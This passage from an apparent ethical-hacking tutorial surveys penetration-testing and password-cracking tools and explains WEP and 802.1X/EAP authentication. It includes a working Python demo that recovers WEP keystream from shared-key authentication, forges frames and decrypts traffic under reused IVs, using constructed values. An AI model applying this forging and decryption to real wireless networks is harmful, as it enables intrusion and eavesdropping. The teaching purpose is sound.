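Replace SAMPLE_NMAP_XML with the contents of a real -oX file and the same functions give you a host inventory that can be diffed between scans, which is how the "monitoring host or service uptime" use mentioned above is usually automated.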

Metasploit
Metasploit is one of the most widely used exploitation frameworks. It is a product of Rapid7
and most of its resources can be found at: [Link]. It comes in two
versions − a commercial edition and the free, open-source Framework. Metasploit can be
driven from the msfconsole command-line interface or, in the commercial edition, from a
web UI.

With Metasploit, you can perform the following operations −
 Conduct basic penetration tests on small networks
 Run spot checks on the exploitability of vulnerabilities
 Discover the network or import scan data
 Browse exploit modules and run individual exploits on hosts

Burp Suite
Burp Suite is a popular platform that is widely used for performing security testing
of web applications. It has various tools that work in collaboration to support the
entire testing process, from initial mapping and analysis of an application's attack
surface, through to finding and exploiting security vulnerabilities.

Burp is easy to use and gives the tester full control to combine advanced manual
techniques (intercepting and modifying requests in its proxy, replaying them from
Repeater) with automation for efficient testing. Burp can be easily configured and
it contains features to assist even the most experienced testers with their work.

Angry IP Scanner
Angry IP scanner is a lightweight, cross-platform IP address and port scanner. It can
scan IP addresses in any range. It can be freely copied and used anywhere. In order
to increase the scanning speed, it uses multithreaded approach, wherein a
separate scanning thread is created for each scanned IP address.

Angry IP Scanner simply pings each IP address to check if it’s alive, and then, it
resolves its hostname, determines the MAC address, scans ports, etc. The amount
of gathered data about each host can be saved to TXT, XML, CSV, or IP-Port list
files. With help of plugins, Angry IP Scanner can gather any information about
scanned IPs.

Cain & Abel
Cain & Abel is a password recovery tool for Microsoft operating systems. It helps
in easy recovery of various kinds of passwords by employing any of the following
methods −
 sniffing the network,
 cracking encrypted passwords using Dictionary, Brute-Force and
Cryptanalysis attacks,
 recording VoIP conversations,
 decoding scrambled passwords,
 recovering wireless network keys,
 revealing password boxes,
 uncovering cached passwords and analyzing routing protocols.
Cain & Abel is a useful tool for security consultants, professional penetration
testers and everyone else who plans to use it for ethical reasons.

Ettercap
Ettercap stands for Ethernet Capture. It is a network security tool for Man-in-the-
Middle attacks. It features sniffing of live connections, content filtering on the fly
and many other interesting tricks. Ettercap has inbuilt features for network and
host analysis. It supports active and passive dissection of many protocols.

You can run Ettercap on all the popular operating systems such as Windows, Linux,
and Mac OS X.

EtherPeek
EtherPeek is a wonderful tool that simplifies network analysis in a multiprotocol
heterogeneous network environment. EtherPeek is a small tool (less than 2 MB)
that can be easily installed in a matter of few minutes.

EtherPeek proactively sniffs traffic packets on a network. By default, EtherPeek
supports protocols such as AppleTalk, IP, IP Address Resolution Protocol (ARP),
NetWare, TCP, UDP, NetBEUI, and NBT packets.

SuperScan
SuperScan is a powerful tool for network administrators to scan TCP ports and
resolve hostnames. It has a user friendly interface that you can use to −
 Perform ping scans and port scans using any IP range.
 Scan any port range from a built-in list or any given range.
 View responses from connected hosts.
 Modify the port list and port descriptions using the built in editor.
 Merge port lists to build new ones.
 Connect to any discovered open port.
 Assign a custom helper application to any port.

QualysGuard
QualysGuard is an integrated suite of tools that can be utilized to simplify security
operations and lower the cost of compliance. It delivers critical security intelligence
on demand and automates the full spectrum of auditing, compliance and
protection for IT systems and web applications.
QualysGuard includes a set of tools that can monitor, detect, and protect your
global network.

WebInspect
WebInspect is a web application security assessment tool that helps identify
known and unknown vulnerabilities within the Web application layer.

It can also help check that a Web server is configured properly, and attempts
common web attacks such as parameter injection, cross-site scripting, directory
traversal, and more.

LC4
LC4 is version 4 of L0phtCrack, a password auditing and recovery application. It is
used to test password strength and sometimes to recover lost Microsoft Windows
passwords, by running dictionary, brute-force and hybrid attacks against the captured
LM/NTLM password hashes.

LC4 recovers Windows user account passwords to streamline migration of users to
another authentication system or to access accounts whose passwords are lost.

LANguard Network Security Scanner
LANguard Network Scanner monitors a network by scanning connected machines
and providing information about each node. You can obtain information about
each individual operating system.

It can also detect registry issues and produce a report in HTML format. For each
computer, you can list the NetBIOS name table, the currently logged-on user, and the
MAC address.

Network Stumbler
Network Stumbler (NetStumbler) is a Wi-Fi scanner and monitoring tool for Windows that
lets network professionals detect WLANs. It is widely used by networking enthusiasts
and attackers for war-driving. Because it works by actively sending probe requests, it
does not reveal networks whose SSID broadcast is disabled; a passive monitor-mode
sniffer such as airodump-ng is needed for those.

Network Stumbler can be used to verify that a network is well configured, to check its
signal strength and coverage, to detect interference between wireless networks, and to
find unauthorised (rogue) access points.
ToneLoc
ToneLoc stands for Tone Locator. It was a popular war dialling computer program
written for MS-DOS in the early 90’s. War dialling is a technique of using a modem
to automatically scan a list of telephone numbers, usually dialling every number in
a local area code.

Malicious hackers use the resulting lists in breaching computer security - for
guessing user accounts, or locating modems that might provide an entry-point into
computer or other electronic systems.

It can be used by security personnel to detect unauthorized devices on a
company's telephone network.

Wireless Network Security

Wireless networks are convenient for end users but complex in their working: many
protocols and technologies work together to give users a stable connection. Data
travelling over a cable gives users some sense of security, since a wire must be
physically tapped to be read, whereas anything sent over the air is received by every
radio within range.
To secure a wireless connection, we should focus on the following areas –
 Identifying the endpoints of the wireless network and the end users, i.e., Authentication.
 Protecting wireless data packets from a man in the middle, i.e., Privacy.
 Keeping the wireless data packets intact, i.e., Integrity.
We know that wireless clients form an association with an Access Point (AP) and transmit
data back and forth over the air. As long as all wireless devices follow the 802.11
standards they coexist, but not all wireless devices are friendly and trustworthy: rogue
devices may be a threat to wireless security. A rogue device can steal our important data
or cause the unavailability of the network.
Wireless security is ensured by the following methods –
 Authentication
 Privacy and Integrity
In this section we talk about Authentication. Two authentication schemes are covered:
WEP shared-key authentication, and Extensible Authentication Protocol over 802.1X
(802.1x/EAP).
These are explained as follows.
1. Wired Equivalent Privacy (WEP) :
The default 802.11 "open system" authentication accepts any client, so on its own it
provides no security for data transmitted over the air. WEP uses the RC4 stream cipher to
encrypt every frame: the sender and the receiver both derive the keystream from a string
of bits called the WEP key; the sender XORs it with the data and the receiver XORs it again
to decrypt.
The WEP key can be used for authentication as well as for encryption. With shared-key
authentication a client can associate with the AP only if it knows the WEP key. The AP
tests that knowledge with a challenge: it sends the client a random challenge text in the
clear; the client WEP-encrypts the challenge with its key and sends it back; the AP decrypts
the response and compares it with the challenge it sent, and if the two match the client is
allowed to associate.
This exchange is itself a weakness: anyone listening sees both the plaintext challenge and
its ciphertext, XORs the two, and obtains the RC4 keystream for that IV, which is enough to
answer the AP's next challenge without knowing the key. For that reason shared-key
authentication is considered weaker than open authentication combined with WEP encryption.
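The WEP weaknesses referred to in this unit (the 24-bit IV and keystream reuse under "Role of WEP", the IV harvesting that "Cracking WEP keys" relies on, and the challenge-response leak of shared-key authentication just described) all follow from the same construction, so one example serves all three passages. The Python below is an added example, not aircrack-ng or any vendor's code: it implements RC4 and the WEP frame format, recovers a keystream from one observed shared-key authentication and forges a valid frame with it, recovers an unknown frame from a known one under a reused IV, and computes the birthday bound after which IVs start repeating. The key, IVs, payloads and challenge are constructed values.

```python
"""Why WEP fails: keystream reuse and shared-key authentication.

Added example for the WEP material in this unit (the "Role of WEP", "Cracking
WEP keys" and "1. Wired Equivalent Privacy" passages); it is not aircrack-ng
code. It implements RC4 and the WEP frame format from the standard; the key,
IVs, payloads and the 128-byte challenge are constructed values.
"""
import math
import struct
import zlib

IV_BITS = 24


def rc4(key: bytes, length: int) -> bytes:
    """RC4 key scheduling (KSA) followed by `length` bytes of keystream (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(payload: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame body = IV(3) || key-id(1) || RC4(IV || key) XOR (payload || ICV)."""
    assert len(iv) == 3 and len(key) in (5, 13), "40- or 104-bit key, 24-bit IV"
    keystream = rc4(iv + key, len(payload) + 4)
    return iv + b"\x00" + xor(payload + icv(payload), keystream)


def wep_decrypt(key: bytes, body: bytes):
    """Return (payload, icv_ok) for a frame body produced by wep_encrypt."""
    iv, cipher = body[:3], body[4:]
    plain = xor(cipher, rc4(iv + key, len(cipher)))
    payload, tag = plain[:-4], plain[-4:]
    return payload, tag == icv(payload)


def keystream_from_shared_key_auth(challenge: bytes, response_body: bytes):
    """Shared-key authentication leaks keystream: the AP sends the challenge in the
    clear and the client returns it WEP-encrypted, so a listener XORs the two and
    obtains RC4(IV || key) for that IV without ever learning the key."""
    iv = response_body[:3]
    keystream = xor(response_body[4:], challenge + icv(challenge))
    return iv, keystream


def forge_frame(iv: bytes, keystream: bytes, payload: bytes) -> bytes:
    """Encrypt an arbitrary payload with recovered keystream (no key needed).
    This is enough to answer the AP's next challenge and to inject packets."""
    plain = payload + icv(payload)
    assert len(plain) <= len(keystream), "only as many bytes as were recovered"
    return iv + b"\x00" + xor(plain, keystream[:len(plain)])


def recover_with_iv_reuse(body_a: bytes, payload_a: bytes, body_b: bytes) -> bytes:
    """Two frames under the same IV share a keystream, so C_a XOR C_b = P_a XOR P_b;
    knowing P_a (e.g. a predictable ARP or DHCP packet) reveals P_b."""
    assert body_a[:3] == body_b[:3], "attack needs identical IVs"
    n = min(len(payload_a), len(body_b) - 8)          # 3 IV + 1 key-id + 4 ICV
    return xor(xor(body_a[4:4 + n], body_b[4:4 + n]), payload_a[:n])


def frames_until_iv_collision(prob: float = 0.5) -> int:
    """Birthday bound: frames after which some IV has repeated with probability `prob`."""
    return math.ceil(math.sqrt(-2 * (2 ** IV_BITS) * math.log(1 - prob)))


def demo():
    key = bytes.fromhex("0102030405")              # constructed 40-bit key
    iv = b"\x11\x22\x33"
    # 1. A listener turns one shared-key authentication into a valid forged frame.
    challenge = bytes(range(128))                  # AP's 128-byte challenge text
    response = wep_encrypt(key, iv, challenge)     # legitimate client's answer
    leaked_iv, ks = keystream_from_shared_key_auth(challenge, response)
    forged = forge_frame(leaked_iv, ks, b"injected by attacker")
    # 2. IV reuse: a known frame and an unknown one under the same IV.
    known = b"ARP who-has 10.0.0.1 tell 10.0.0.9"
    secret = b"GET /admin HTTP/1.0 auth=hunter2"
    recovered = recover_with_iv_reuse(wep_encrypt(key, iv, known), known,
                                      wep_encrypt(key, iv, secret))
    return {"forged_decrypts": wep_decrypt(key, forged),
            "recovered": recovered,
            "frames_to_collision": frames_until_iv_collision()}


if __name__ == "__main__":
    print(demo())
```

Note that the forged frame decrypts with a valid ICV even though the attacker never held the key, and that roughly five thousand frames are enough for a 50 % chance of an IV repeat; a busy access point sends that many in minutes, which is why the "capture a large number of IVs" step in the cracking procedure is so cheap.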

2. Extensible Authentication Protocol (802.1x/EAP) :
With WEP, authentication of the wireless client takes place locally at the AP. With 802.1X
the picture changes: a dedicated authentication server is added to the infrastructure, and
three parties take part –
1. Supplicant –
The device requesting access (the wireless client).
2. Authenticator –
The device that controls access to the network, usually the AP or a WLAN controller
(WLC); it relays EAP messages between supplicant and server and opens the port only
when the server says so.
3. Authentication Server –
The device that checks the client's credentials and grants or denies access, normally a
RADIUS server.

EAP is a framework rather than a single method; the methods commonly used over 802.1X,
each improving on the previous one, are –
 LEAP (Cisco's early proprietary method; its MS-CHAP-based exchange is vulnerable to
offline dictionary attacks and it should no longer be used)
 EAP-FAST (Cisco's replacement for LEAP, which tunnels the credential exchange)
 PEAP (credentials exchanged inside a TLS tunnel authenticated by the server's
certificate; the client must validate that certificate, or a rogue AP can harvest
credentials)
 EAP-TLS (mutual certificate authentication of client and server; the strongest of the
four)
